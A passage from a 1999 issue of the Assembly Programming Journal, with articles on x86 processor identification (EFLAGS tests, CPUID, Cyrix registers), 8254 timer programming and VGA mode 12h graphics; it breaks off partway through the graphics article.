::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                               Oct/Nov   99
:::\_____\::::::::::.                                              Issue      6
::::::::::::::::::::::.........................................................

            A S S E M B L Y      P R O G R A M M I N G      J O U R N A L
                      http://asmjournal.freeservers.com
                           asmjournal@mailcity.com


T A B L E    O F    C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_

"Processor Identification"........................Chris.Dragan.&.Chili

"Timing with the 8254 PIT"...............................Jan.Verhoeven

"Programming the Universal Graphics Mode"................Jan.Verhoeven

"Conway's Game of Life".................................Laura.Fairhead

"'Ambulance Car' Disassembly"....................................Chili

"'Ambulance Car' Disinfector"....................................Chili

"Assembling for PIC's"...................................Jan.Verhoeven

"Splitting Strings"............................................mammon_

"String to Numeric Conversion"..........................Laura.Fairhead

Column: Win32 Assembly Programming
    "WndProc, The Dirty Way".................................X-Calibre
    "Programming the DOS Stub"...............................X-Calibre

Column: The Unix World
    "Using ioctl()"............................................mammon_

Column: Assembly Language Snippets
    "BinToString"....................................Cecchinel Stephan

Column: Issue Solution
    "Absolute Value"....................................Laura.Fairhead

----------------------------------------------------------------------
       ++++++++++++++++++Issue    Challenge+++++++++++++++++
        Find the Absolute Value of a Register in    4 Bytes
----------------------------------------------------------------------


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                                     by mammon_


Customarily I'll start with the bad news: this issue is about a week late,
primarily because I had forgotten about the two Win32 articles X-Calibre
passed on to me a month or two ago. The good news, however, is that there
may be a December issue; currently I have about 5 or so extra articles that
threatened to bump this issue over the 200K mark. Evenutally I may have a
chance to be late on a monthly basis...

This issue has a bit of a 'back to the basics' feel about it. Packed inside
are articles dealing with some of the 'classics' of assembly: CPU identific-
ation, graphics, and the ever-popular Game of Life. The disassembly of the
Ambulance Car virus also has an old-school feeling to it, hearkening back to
the old days of DOS and com files.

Additional highlighs include X-Calibre's 'bending windows to your will' Win32
articles, two excellent chip programming articles from Jan, utility routines
from Laura and myself, and of course my usual attempt to defend assembly as a
viable programming language for the Unix environment.

Enough commentary; time to get this mag on the road!


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                       Processor Identification
                                                       by Chris Dragan & Chili


Being able to identify the processor in which your program is running, can be a
very useful feature,  if not to ensure that     your program will work     on a wider
range of computers,     at least to provide minimum compatibility and guarantee it
not to crash on some processors.

The first part of this article    explains how to distinguish between older 80486
and lower  processors by checking  for known behaviours,  while the second part
(written by Chris)    takes it one step forward,    explaining how to use the CPUID
instruction on newer processors, checking the ID register by means of a TFR and
how to correctly identify a Cyrix processor.


EFLAGS Register
---------------
On old pre-286 CPUs,  bits 12 through 15 of the FLAGS register are always  set,
so we can  check for this  type of processor,  in opposition to newer ones,     by
attempting to clear those bits:

                pushf
                pop        ax
                and        ax, 0fffh        ; clear bits 12-15
                push    ax
                popf
                pushf
                pop        ax
                and        ax, 0f000h
                cmp        ax, 0f000h        ; check if bits 12-15 are set
                je        _is_an_older_cpu
                jne        _is_a_286_or_higher

Once we know that we are at least on a 286 processor,  we can then check to see
if we're on a 32-bit processor    (386 or higher)     or on an actual 286.  For this
purpose we know that bits 12-15 of the FLAGS register are always clear on a 286
processor in real mode:

                pushf
                pop        ax
                or        ax, 0f000h        ; set bits 12-15
                push    ax
                popf
                pushf
                pop        ax
                and        ax, 0f000h        ; check if bits 12-15 are clear
                jz        _is_a_286
                jnz        _is_a_386_or_higher

If instead, the processor is running in     protected mode these bits are used for
the IOPL (bits 12-13) and NT (bit 14) flags. Note that bits 12-14 hold the last
value loaded  into them on 32-bit processors  in real mode.     Also remember that
there is no virtual-8086 mode on 16-bit processors.

In order to find out if the processor is in real or protected mode we must test
if the    Protection Enable  flag     (bit 0 of CR0)     is set,  if so     then we're     in
protected mode:

                smsw    ax
                and        ax, 0001h        ; check if bit 0 (PE) is clear
                jz        _real_mode
                jnz        _protected_mode

To find out     if it is a 486 or a  newer processor we'll try     to set the AC flag
(bit 18),  since it     is always    clear on a    386 processor  (also NexGen Nx586),
unlike newer ones that allow it to be toggled:

                pushfd
                pop        eax
                mov        ebx,eax
                xor        eax,40000h        ; toggle bit 18
                push    eax
                popfd
                pushfd
                pop        eax
                xor        eax,ebx            ; check if bit 18 changed
                jz        _is_a_386
                jnz        _is_a_486_or_higher

And finally to    check if we're in an  old 486 or in a  new 486 and other  newer
processors    (i.e. Pentium),     we'll try    to toggle  the ID flag    (bit 21)  which
indicates the presence of a processor that supports the CPUID instruction. This
part is explained below in a section about CPUID.


PUSH SP Instruction
-------------------
Before the 286, processors implemented the "PUSH SP" instruction in a different
way,  updating the stack  pointer before  the value     of SP    is pushed  onto the
stack,    unlike newer processors     which push the value  of the SP register as it
existed before    the instruction     was executed  (both in     real and  virtual-8086
modes).

  Older CPUs            286+
  {                        {
   SP = SP - 2             TEMP = SP
   SS:SP = SP             SP = SP - 2
  }                         SS:SP = TEMP
                        }

  (credit for the PUSH SP algorithm representation goes to Robert Collins)

So all    one has to    do is see if  the values of     the SP register  are different
before and after the PUSH SP:

                push    sp
                pop        ax
                cmp        ax, sp            ; check if SP values differ
                je        _is_a_286_or_higher
                jne        _is_an_older_cpu

Note - If you want    the same result     on all processors,     use the following code
       instead of a PUSH SP instruction:

                push    bp
                mov        bp, sp
                xchg    bp, [bp]


Shift and Rotate Instructions
-----------------------------
Starting with the 186/88, all processors mask shift/rotate counts by modulo 32,
restricting     the maximum count to 31  (in all  operating modes,     including    the
virtual-8086 mode).     Earlier CPUs do not mask  the shift/rotation count,  using
all 8-bits of CL.  So, if we try to perform a 32-bit shift, on newer processors
we'll  end up  with the     same result  (since the  shift count  is masked to 0),
whereas on an older processor the result will be zero:

                mov        ax, 0ffffh
                mov        cl, 32
                shl        ax, cl            ; check if result is zero
                jz        _is_an_older_cpu
                jnz        _is_a_18x_or_higher


MUL Instruction
---------------
NEC processors    differ from Intel's     with respect to  the handling of  the zero
flag (ZF) during a MUL operation. While a NEC V20/V30 does not clear ZF after a
non-zero multiplication result, but only according to it, an Intel 8086/88 will
always clear it (note that this is only true for the specified processors):

                xor        al, al            ; force ZF to set
                mov        al, 40h
                mul        al                ; check if ZF is clear
                jz        _is_a_NEC_V20_V30
                jnz        _is_an_Intel_808x

In addition to the list of sites where you can find more information,  provided
by Chris at the end of this article, you can also try this one:

        http://grafi.ii.pw.edu.pl/gbm/x86/       (Grzegorz Mazur)

And also the following packages/programs (available somewhere in the net):

        The Undocumented PC                       (Frank van Gilluwe)
        HelpPC                                   (David Jurgens)
        80x86.CPU file                           (Christian Ludloff)


ID Register
-----------
Beginning  with the 80386 processor,  Intel included  a so-called  ID register,
which  contains     information  about     the  processor     model and    stepping.  This
register is accessible in an unusual way - it is passed in DX after reset.

To read the ID register one must proceed the following steps:

 1. By storing value 0Ah (resume with jump)     at address 0Fh (reset code) in the
    CMOS data area,     inform BIOS not to     issue POST after reset,  but to return
    the control to the program.
 2. Update after-reset-far-jump address at 0040h:0067h.
 3. Set     shutdown  status  word     (0040h:0072h)    to    0,     to     avoid    undesirable
    side-effects.
 4. Cause a reset.

Causing a reset     is typically done by  issuing a so-called    triple-fault-reset,
i.e.  causing  an error     from which the     processor    cannot    recover and     enters
a reset state.    TFR (triple...)     can be     done only    if we  have enough    control
over  the processor,  i.e.    under plain     DOS  in  real mode     (no EMS)  or under
Win'95 (this is risky).     The following code shows how to do it in DOS. The code
is assumed to be in a COM program.

;------------------------------------------------------------------------------

section .data

GDT                dd 0, 0                    ; Selector 0 is empty
                dd 0000FFFFh, 00009A00h ; Selector 8 - code segment
GDTR            dw 000Fh, 0, 0            ; Limit 0Fh - two selectors
IDTR            dw 0, 0, 0                ; Empty IDT will cause TFR

section .text

        ; Ensure that we are in real mode, not in V86
                smsw    ax
                and        al, 1
                jnz        near _skip_tfr_since_in_v86_mode

        ; Update code descriptor as we are going to enter pmode
                xor        eax, eax
                mov        ax, cs
                shl        eax, 4
                or        [GDT+10], eax
                add        eax, GDT
                mov        [GDTR+2], eax

        ; Update reset code in CMOS data area
                cli                                ; Disable interrupts
                mov        [SaveSP], sp            ; Save stack pointer
                mov        al, 0Fh                    ; Address 0Fh in CMOS area
                out        70h, al
times 3            jmp        short $+2                ; Short delay
                mov        al, 0Ah                    ; Value 0Ah - far jump
                out        71h, al

        ; Update resume address
                push    word 0
                pop        es
                mov        [es:0467h], word _tfr    ; offset
                mov        [es:0469h], cs            ; segment
                mov        [es:0472h], word 0        ; Update shutdown status

        ; Switch to pmode
                lgdt    [GDTR]                    ; Load GDT
                lidt    [IDTR]                    ; Load empty IDT
                smsw    ax
                or        al, 01h                    ; Set pmode bit
                lmsw    ax
                jmp        0008h:_reset            ; Reload CS
_reset:            mov        ax, [cs:0FFFFh]            ; Reach beyond segment limit

        ; After reset we are here with DX containing the ID register
_tfr:            cli
                mov        ax, cs
                mov        ds, ax
                mov        es, ax
                mov        ss, ax
                mov        sp, [SaveSP]
                sti

;------------------------------------------------------------------------------

Of course there are     also other ways of reading the ID register.  They are well
described in DDJ (www.x86.org).

As said before,     the ID register contains information about processor model and
stepping. The format of the register is as follows:

        bits 15..12        - stepping
        bits 11..8        - model
        bits 7..0        - revision

Some example ID register values:

        0303    i386DX
        2303    i386SX
        3301    i376

This format     of the ID register     was used in  Intel 386 processors    (all except
RapidCAD), AMD 386 processors and most of IBM 486 processors.

Another format    of the ID register    was introduced    with Intel 486    processors.
This format is similar    to the format of  CPUID model information  (see below),
and until the  Pentium was kept the same.  However newer processors do not keep
any useful information in the ID register (it is usually 0). This also concerns
Cyrix 486 processors.

        bits 15..14        - unused, zero
        bits 13..12        - typically indicate overdrive
        bits 11..8        - model
        bits 7..4        - stepping
        bits 3..0        - revision

And some example ID register values with this format for Intel processors:

        0401    i486DX-25/33
        0421    i486SX
        0451    i486SX2


Cyrix DIR
---------
All Cyrix processors have a Device-Identification-Registers,  which are used to
identify  these processors.     To read DIRs,    one first has to determine    that he
uses a Cyrix processor. This can be accomplished in two ways:

 1. On modern processors using CPUID instruction.
 2. On first Cyrix processors issuing 5/2 method.

If    there  is  no  CPUID  instruction,     one  has  to  use    the     other    way     of
determination.    If one    knows that he  is on a    486 processor,    he can    use the
following code:

                mov        ax, 0005h
                mov        cl, 2
                sahf
                div        cl
                lahf
                cmp        ah, 2
                je        _we_are_on_cyrix
                jne        _this_is_not_cyrix

Once we have  determined we are     on a Cyrix processor,    we can read its DIRs to
get its model and stepping information. All Cyrix processors have their special
registers accessible through ports 22h and 23h.     Port 22h keeps register number
and port 23h register value.

        ; This function reads a Cyrix control register
        ; It expects a register address in AL and returns value also in AL
ReadCCR:        out        22h, al            ; select register
times 3            jmp        short $+2        ; delay
                in        al, 23h            ; get register contents
                ret

DIRs have offsets  0FEh (DIR1) and 0FFh (DIR0).     DIR1 contains revision,  while
DIR0 contains model/stepping. The following code reads them:

                mov        al, 0FEh
                call    ReadCCR
                mov        [DIR1], al
                mov        al, 0FFh
                call    ReadCCR
                mov        [DIR0], al

Example DIR0 values:

        1B        Cx486DX2
        31        6x86(L) clock x2
        55        6x86MX clock x4


CPUID Instruction
-----------------
All newer  processors have    the CPUID instruction,    which helps     to identify on
what  processor     we are.  Before using it,    we must     first determine  if it     is
supported, by flipping the ID flag (bit 21 of EFLAGS).

                pushfd
                pop        eax
                xor        eax, 00200000h    ; flip bit 21
                push    eax
                popfd
                pushfd
                pop        ecx
                xor        eax, ecx        ; check if bit 21 was flipped
                jnz        _cpuid_supported
                jz        _no_cpuid

The only problem may be that NexGen processors do not support the ID flag,    but
they do support the CPUID instruction.    To determine that, we must hook Invalid
Opcode    exception  (int6)  and    execute     the instruction.  If the  exception is
triggered, CPUID is not supported.

Also some  early  Cyrix     processors     (namely  5x86    and     6x86)    have the  CPUID
instruction disabled.  To enable it, we must first enable extended CCRregisters
and then enable the instruction, setting bit 7 in CCR4.

        ; Enable extended CCRs
                mov        al, 0C3h        ; C3 corresponds to CCR3
                call    ReadCCR
                and        ah, 0Fh            ; bits 7..4 of CCR3 <- 0001b
                or        ah, 10h
                call    WriteCCR

        ; Enable CPUID
                mov        al, 0E8h        ; E8 corresponds to CCR4
                call    ReadCCR
                or        ah, 80h            ; bit 7 enables CPUID
                call    WriteCCR

The following functions are used to read/write CCRs:

ReadCCR:        out        22h, al            ; Select control register
times 3            jmp        short $+2
                xchg    al, ah
                in        al, 23h            ; Read the register
                xchg    al, ah
                ret

WriteCCR:        out        22h, al            ; Select control register
times 3            jmp        short $+2
                mov        al, ah
                out        23h, al            ; Write the register
                ret

After enabling CPUID we must  test if it is supported by  flipping the ID flag,
unless    of course  we  have determined    that  we are not  on a    5x86 or 6x86 by
reading DIRs.

Once we have determined that CPUID is supported,  we can use it to identify the
processor.    The instruction expects EAX     to hold a function number    and returns
information corresponding to this number in EAX, ECX,EDX and EBX.  The two most
important levels are listed below.

        level 0 (eax=0) returns:

        eax                Maximum available level
        ebx:edx:ecx        Vendor ID in ASCII characters
                        Intel    - "GenuineIntel" (ebx='Genu', bl='G'(47h))
                        AMD        - "AuthenticAMD"
                        Cyrix    - "CyrixInstead"
                        Rise    - "RiseRiseRise"
                        Centaur - "CentaurHauls"
                        NexGen    - "NexGenDriven"
                        UMC        - "UMC UMC UMC "

        level 1 (eax=1) returns:

        eax                bits 13..12        0 - normal
                                        1 - overdrive
                                        2 - secondary in dual system
                        bits 11..8        model
                        bits 7..4        stepping
                        bits 3..0        revision
                        If Processor Serial Number is enabled, all 32
                        bits are treated as the high bits (95..64) of
                        the number.
        edx                Processor features (e.g. bit 23 indicates MMX)

There are also    other levels,  i.e. level 2 returns cache  and TLB descriptors,
level 3 the rest of Processor Serial Number.

Other processors (AMD, Cyrix) also support extended levels.     The first extended
level is  80000000h and     it returns in    EAX the maximum     extended level.  These
extended levels     return information     specific to  that processors,    e.g. 3DNow!
support or processor name.

This example code determines MMX support:

        ; First check maximum available level
                xor        eax, eax        ; eax = 0 (level 0)
                cpuid
                cmp        eax, 0
                jng        _no_higher_levels

        ; Now check MMX support
                mov        eax, 1            ; level 1
                cpuid
                test    edx, 00800000h    ; bit 23 is set if MMX is supported
                jnz        _mmx_supported
                jz        _no_mmx

As this is not    the place for listing all the  available information about what
values    are returned  by CPUID,     ID register or DIRs,  you should get  the most
recent information from the processor vendors:

        www.intel.com
        www.amd.com
        www.cyrix.com

Also you can find very valuable information about the identification topic on:

        www.sandpile.org
        www.x86.org
        www.cs.cmu.edu/~ralf/files.html


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                       Timing with the 8254 PIT
                                                       by Jan Verhoeven


Some time ago I saw a note on the mailinglist from someone in need for a
flexible timer function. For this, there are several concepts.

First, there is the timertick which is updated every 55 ms. For long
time delays, this is the best method. Just read the timervalue at
0000:046C, add the desired delay (in 55 ms intervals) and wait until the
timer reaches that value.

A second approach is to use modern BIOS-ses which have a timingfunction
in BIOS interrupt 15h, but this is "only" present on machines from 1990
or later.

A third approach is to reprogram the RTC chip. No big deal, and there's
a very accurate timer in it (upto 8 kHz) which even has interrupt
capabillities for automated functions and simple multitaskings.

But by far the best way (and most universal and accurate) is to use the
"spare" timer in your PC's 8254 chip.

This chip can be put in many operating modes, but we want it to do the
following:

        - start counting at a certain value
        - count down
        - latched reading mode
        - no influence on further PC operation

The counting sequence for the PC is as follows:

        - there are 2^16 BIOS-timervalue updates per hour
        - there are 2^16 8254 clockpulses per timertick

So, there are 2^32 clockpulses per hour. This boils down to one clock
pulse being around 838 ns. Not bad.

In order to make things very clear I use Modula-2 to show how the
routines are coded. Modula is an extremely structured language, so I use
it as a kind of Meta-Assembler or Pseudo-Assembler.
For those not too familiar with Modula: a CARDINAL is not an old man in
a dress, but a 16 bit unsigned integer.

Here comes.....

---------- OpenTimer ---------------------------- Start ----------

PROCEDURE OpenTimer;        (*    open timer chip in mode 2    *)

BEGIN
    ASM
        MOV     AL, 34H
        OUT     43H, AL
        XOR     AL, AL
        OUT     40H, AL
        OUT     40H, AL
    END;
END OpenTimer;

---------- OpenTimer ----------------------------- End -----------

The value 34h is constructed as follows:

        bit        function
       -----    ---------------------------
       6 - 7    select counter (0 - 3)
       4 - 5    Read/write mode
       1 - 3    Select countermode
         0        Binary or BCD

For this case we selected:

        - counter 00
        - read/write two bytes from/to counterchip
        - Mode 2
        - binary values

These few lines open the timer in "Mode 2" and prime the down counting
register to 0000. I would love to elaborate on the code, but this is all
which is needed....

It is kind of handy if you restore the state of your machine after your
application stops using the CPU. Therefore there is the following
function to restore "normal" operation of this channel.

---------- CloseTimer --------------------------- Start ----------

PROCEDURE CloseTimer;            (*    close timer chip    *)

BEGIN
    ASM
        MOV     AL, 36H
        OUT     43H, AL
        XOR     AL, AL
        OUT     40H, AL
        OUT     40H, AL
    END;
END CloseTimer;

---------- CloseTimer ---------------------------- End -----------

This function just restores the timer to it's default mode and clears
the counting registers. The value "36h" means:

        - counter 00
        - read/write two bytes from/to counterchip
        - Mode 3
        - binary values

---------- ReadTimer ---------------------------- Start ----------

PROCEDURE ReadTimer () : CARDINAL;       (*  read timer    *)

VAR        Time        : CARDINAL;

BEGIN
    ASM
        MOV     AL, 6
        OUT     43H, AL
        IN     AL, 40H
        MOV     AH, AL
        IN     AL, 40H
        XCHG AH, AL
        MOV     [Time], AX
    END;
    RETURN Time;
END ReadTimer;

---------- ReadTimer ----------------------------- End -----------

After we opened the timer, it might be a good idea to also use it. This
is done in a two-step operation:

 - current value of counting register is stored in On-Chip buffer
 - the low byte is read in first
 - the high byte is read in second
 - low and high byte are put in right order

Make sure you always read in TWO bytes, else you will run into framing
errors. Also keep in mind that this is a DOWN-COUNTER!

The value "6" which is sent to the 8254 first might be wrong, but in all
my software it just works fine. It selects Channel 0 to be latched. The
lower four bits of this word should be "don't care" bits, but I prefer
"not to fix a running program".

---------- MilliSeconds ------------------------- Start ----------

PROCEDURE MilliSeconds (ms : CARDINAL);

VAR        MaxCount        : CARDINAL;

BEGIN
    MaxCount := 65535 - ms * 1193;
    OpenTimer;
    WHILE ReadTimer () > MaxCount DO
        (*        Nothing!     *)
    END;
    CloseTimer;
END MilliSeconds;

---------- MilliSeconds -------------------------- End -----------

This function has some deliberate errors inside. I calculate MaxCount
such that it is too big. Reason: in Modula I do not control math
operations as well as in ASM (of course!) That's why I subtract the
value from 65,535 instead of 65,536. In ASM I would have used a NOT
operation, but for Modula this is good enough.

Furthermore I use the number 1193 to go from counting pulses to
milliseconds. It's a not too big number so it is good enough to use in
integer arithmatics.

This "MilliSeconds" routine is a dumb waiting-procedure. It calculates a
stop-value for the counter, initialises the counter to mode 2 and value
0000 and then waits until the timer reaches there. Next it closes the
timer and it's all over.

The next function, which was made for diagnostic purposes, shows that in
an application you would have to correct for the

---------- TestTimer ---------------------------- Start ----------

PROCEDURE TestTimer;

VAR        First, Last, Delta, k         : CARDINAL;

BEGIN
    OpenTimer;
    First := ReadTimer ();
    WriteCard (First, 6);        Write (Tab);
    FOR k := 1 TO 10000 DO
        (*        Nothing!     *)
    END;
    Last := ReadTimer ();
    Delta := First - Last;
    WriteCard (Delta, 6);        WriteLn;
    CloseTimer;
END TestTimer;

---------- TestTimer ----------------------------- End -----------

You could use this routine to calibrate a timingloop, but on modern PC
architectures this could well lead to disasters. Modern CPU's are so
damned fast, that your loopcounter will overflow.
Therefore this calibration technique is only useful for modifying
inherently slow routines, like those using I/O operations. For some
reason, I/O operations still need around one microsecond each, so these
will slow down the routine enough to make sure there will be no overflow
in the loop-counters.

A friend of mine just uses IN instructions from some silly address to
get reasonably accurate timingloops, assuming that 1 IN operation is
about 1 microsecond. Bit it could well lead to trouble on modern PCI
hardware.

All in all, for most delay-routines, the dumb waiting function is by far
the best since it is the most reliable and accurate to less than a
microsecond. But if you need this many digits, use compensated software,
that takes into account the time to read the timers twice -- because you
need to keep in mind that also this routine relies heavily on I/O
instructions, so it is not infinitely fast!


In a future article I will describe how to use the RTC chip for
generating timing signals and how to use it via the Programmable
Interrupt Controller in automatic mode. That article will be pure ASM
again, so don't be worried about this detour into Modula.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                       Programming for the one and only universal graphics mode
                                                               by Jan Verhoeven


If you need to write a graphics routine that has a reasonable resolution and
which is nearly always present, there is just one choice: mode 12h or the well
known 640 x 480 x 16. This mode is the highest resolution mode which is always
available in all VGA cards.
800 x 600 is better but it either needs a VESA driver installed or the user
must himself figure out how to switch the machine to that mode. Not an easy
task for the majority of "experienced Windows users" (isn't this a paradox?).

Mode 12h is treated as a worst case by many Superior Operating Systems. But
for most purposes it is just fine. It's fast, reasonably easy to use and it is
omni present.

That's why I decided to port my textmode windows to this graphics mode.


The application.
----------------
I built a simple AD converter that measures voltages and converts them into
digits. The ADC fits on a COM port and is completely controlled from software.
The idea was to have different reference voltages, sample rates, scaling
factors, a bar graph display and a 4 digit LED-style read-out.
And in the bottom window there is a "recorder" that plots pixels in real-time.

If all parts have been explained I might post the full package (the sources,
the schematics and such) so that everyone can build one for your own.


How to switch to Mode 12h?
--------------------------
Going to mode 12h is easy. Just use the BIOS interrupt 10h as follows:

        mov        ax, 012
        int        010

and you're in. Remember, I use A86 syntax, so all numbers starting with a
nought are considered hexadecimal.


Plotting in a graphics screen.
------------------------------
Now that we're in Mode 012, we should also try to fill that clear black
rectangle. But first we should define a way of remembering WHERE to put our
cute little dots.

For all my plotting, I use the following structure:

    -------------------------------- Window Information Block ------
    Infoblk1 STRUC
    Win_X     dw       ?        ; top-left window position, X and ...
    Win_Y     dw       ?        ;      ... Y
    Win_wid     dw       ?        ; window width and ...
    Win_hgt     dw       ?        ;      ... height
    CurrX     dw       ?        ; within window, current X-coordinate, ...
    CurrY     dw       ?        ;      ... and Y
    DeltaX     dw       ?
    DeltaY     dw       ?
    Indent     dw       ?        ; Indentation for characters in PIXELS!
    Multiply dw       ?        ; screenwidth handler
    Watte01     dw       ?        ;
    BoxCol     db       ?        ;      border colour
    TxtCol     db       ?        ;        text colour
    BckCol     db       ?        ; background colour
    MenuCol     db       ?        ;  menu text colour
             ENDS
    -------------------------------- Window Information Block ------

It will be clear after looking into this list, that each InfoBlock describes a
window, a rectangular portion of the screen, which is treated as a unity.

Each window is defined by the topleft (x,y) coordinates and the window width
and height. Knowing these four words, the window is defined and fixed on
screen. If the window is to be moved, just adjust the topleft (x,y) position.

Since it is handy to know where in this window we are plotting, I defined two
more X and Y values: "CurrX" and "CurrY". When a request to (un)plot is made,
it will start on these coordinates.

For line drawing and such there are the "DeltaX" and "DeltaY" variables. The
former is for horizontal lines, the latter for vertical lines.

Now that we have our fancy window, where we can plot and draw lines, we also
need some text to see what it's all supposed to be about. The text is plotted
at the CurrX and CurrY postions. Each character is PLOTTED there, so tokens
can be put at ANY location on screen, not just on byte boundaries.

For nice and easy alignments, I defined the variable "Indent" which defines
how many pixels from the left or right margin must remain blank.

Since this software should be as easy to adapt to other resolutions as
possible, there is a need for a "Multiply" variable. This is filled with the
offset address of a dedicated screen multiplier routine.
In Mode 012 there are 640 pixels on a line. That's 80 bytes. So in order to
calculate the pixel address you need to use the following formula:

        PixAddr = CurrY * 80 + CurrX / 8

So we need a set of damned fast Mul_80 routines. If needed you can make some
of them and at init-time find out the CPU and hardware and assign a suitable
routine and fill it in in the Window definition structures.

The "Watte01" field is just a filler. Reserved by me.

Since the Mode 012 has 16 colours to spare we should also use them. Therefore
I set up space for 4 colours: Box-, Text-, Background- and Menu-colours.
Each printing routine will make sure the right colour is set.

It will be clear that each window is very flexible to use. If the position is
wrong, just change a few numbers. Also if the colours are not optimal.
And by having several windows assigned to the same area on screen, you can
easily build special effects:

    fullscrn dw        0,    0,640,480, 0, 0, 0, 0, 4, mul_80, 0
             db       12, 14,    3, 15                ; main screen window

FullScrn just describes the complete screen. It is used for some very general
printing an plotting tasks. It starts at topleft (0,0) and is 640 wide and 480
high.

    ParWin2     dw        5, 30,630,150, 8, 9, 0, 0, 4, mul_80, 0
             db       10, 11,    3, 11                ; Parameter window

This is a window which is a subwindow of the Full Screen for storing data and
parameters.

    PlotWin     dw        5,195,630,260, 0, 0, 0, 0, 4, mul_80, 0
             db        9, 15,    3,    7                ; Virtual plotting window

This is the Virtual Plotting Window. It has some text, plus the actual
plotting window:

    PlotWin2 dw        6,196,628,256, 0, 0, 0, 0, 4, mul_80, 0
             db        9, 15,    3,    7                ; Actual plotting window

This is the place where the pixels live. It starts one pixel down/right of the
virtual window and also ends one pixel short of it.
The reason for making this "dummy" window structure was that this way there is
no need for an elaborate checking of extreme ends of the window while erasing
pixels. On the extremes of the "Virtual Plotting Window" there are the pixels
that make up a nice coloured box. It looks not nice when these lines are
erased. And the easiest way to prevent this was by defining two separate
windows: one for constructing the box and one for the actual work.

The 4 digit LED-style read-out is also controlled by four different windows.
Each digit has its own window definition:

    ------------ Digit Space ------------------------------- Start ---

    DigSpac1 dw       16, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
             db        9, 11, 14,    3           ; Digital display, digit 1, MSD
    DigSpac2 dw       56, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
             db        9, 11, 14,    3           ; Digital display, digit 2
    DigSpac3 dw       96, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
             db        9, 11, 12,    3           ; Digital display. digit 3
    DigSpac4 dw      136, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
             db        9, 11, 12,    3           ; Digital display, digit 4, LSD

    MSD = Most Significant Digit            LSD = Least Significant Digit

    ------------ Digit Space -------------------------------- End ----

This way it is convenient to allign the digits on screen. As with normal LED-
style digits, the seven segments of them are drawn piece by piece. And erased
if necessary.

As you will know from voltmeters, the MSD is the least likely to change in
time and the LSD is most likely to be different between any two samples. So in
a way it is necessary to control erasing of just one digit without massive
software overheads. Therefore I again chose to use a separate window for each
digit. It makes erasing the digit easier and independent of the other three.

Something else to observe is, that the two or three digits behind the decimal
point have another colour from those before it. This way the user can easily
see the approximate magnitude of the number without having to search for a
decimal point. This is accomplished easily by having different BckCols in the
LSD windows.

This all costs a few bytes extra, but it saves a lot of coding.


How to quickly load a segment register.
---------------------------------------
Segment registers cannot be loaded with immediate data. So you normally put a
register on the stack and use that to transfer the constant to the actual
segment register. This is not necessary. It can be done much easier like
below:

    VGA_base dw       0A000        ; for ease of loading segment registers

And the corresponding code:

    mov        es, [VGA_base]

The detour via the stack or via AX takes more cycles and bytes.


Defining what to print.
-----------------------
In a graphics screen there are an awful lot of places where to store our
text. So we need a way to define where to put which tokens. For this I use the
following construct:

    -------------- Topic ----------------------------------- Start ---
    Topic MACRO                ; start of printing message
      dw   #1, #2
      db   #3, #4
      #EM

    TopicEnd MACRO            ; topics stop here
      dw   0F000
      #EM

             Topic 180, 9, 'Start : '
    ParaStrt db       'Manual     ', 0

             Topic    9, 28, 'Power : '
    ParaPowr db       'OFF', 0

             Topic 360, 55, 'Group : '
    ParaGrup db       '16 ', 0

             TopicEnd
    -------------- Topic ------------------------------------ End ----

The Topic Macro puts the first two arguments (the new values for CurrX and
CurrY) in the first two WORD positions of the definition table. The actual
text is then put in the BYTE positions. In most cases there will be no #4
argument, but A86 doesn't care about that.

Each "to-print" table is shut down by an EndTopic Macro. It defines a new
CurrX of -4096. That clearly is out of range, so this is end of table.
In normal operation, small negative values of CurrX and CurrY are accepted and
taken care of, although it can be dangerous to use this feature.


Multiplying by 80.
------------------
On all CPU's form the 486, the MUL instruction is single cycle, so it'll be
damn fast. For all older CPU's, the following code could mean some significant
speed increases:

    -------------------- Multiply ------------------------ Start ----
    mul_80:     push  bx                ; PixAddr in Mode 012
             shl   ax, 4
             mov   bx, ax            ; bx = 16 x SCR_Y
             shl   ax, 2            ; ax = 64 x SCR_Y
             add   ax, bx            ; ax = 80 x SCR_Y
             pop   bx
             ret
    -------------------- Multiply ------------------------- End -----

This routine is used over and over again, so a few microseconds more or less
will make a big difference.


Where to leave our pixels?
--------------------------
Suppose you need to plot pixel (3,0). That's an easy one. It will fit in the
very first byte of the VGA memory array. It's segment is 0A000 and it's offset
is plain 0.
But not the full byte, since that would produce a line. No, we need to access
bit 4 of byte 0.

Yes, the first pixel is bit 7 of byte 0 and the 8th pixel is bit 0 of byte 0.
Or, in index-language, CurrX = 0 addresses bit 7, and so on.

So we need to invert the screenposition into a bitposition. We'll come to that
later. Suppose, by some sheer magic, we succeeded in making that conversion,
we still need to tell the VGA which bit is involved. That's done by means of
the following routine:

    --------------------- SetMask ------------------------ Start -------
    SetMask: push  dx                ; ah = mask
             mov   dx, 03CE
             mov   al, 8
             out   dx, ax            ; set bit mask
             pop   dx
             ret
    --------------------- SetMask ------------------------- End --------

This is an optimized routine. The VGA is a 16 bit card, so we can use 16 bit
I/O instructions for adjacent I/O ports. The construct:

             mov   al, 8
             out   dx, ax            ; set bit mask

is identical to:

             mov   al, 8
             out   dx, al
             inc   dx
             mov   al, ah
             out   dx, al

Anyway, the plottingmask is defined to be as loaded in the AH register. We can
put any value in AH, not just one pixel, but also "no pixels" and "all
pixels".


Defining colour in Mode 012.
----------------------------
Colours to use during plotting are defined in a comparable fashion:

    --------------------- Set Colour --------------------- Start -------
    SetColr: push  dx                ; ah = colour
             mov   dx, 03C4
             mov   al, 2
             out   dx, ax            ; select page register and colour
             pop   dx
             ret
    --------------------- Set Colour ---------------------- End --------

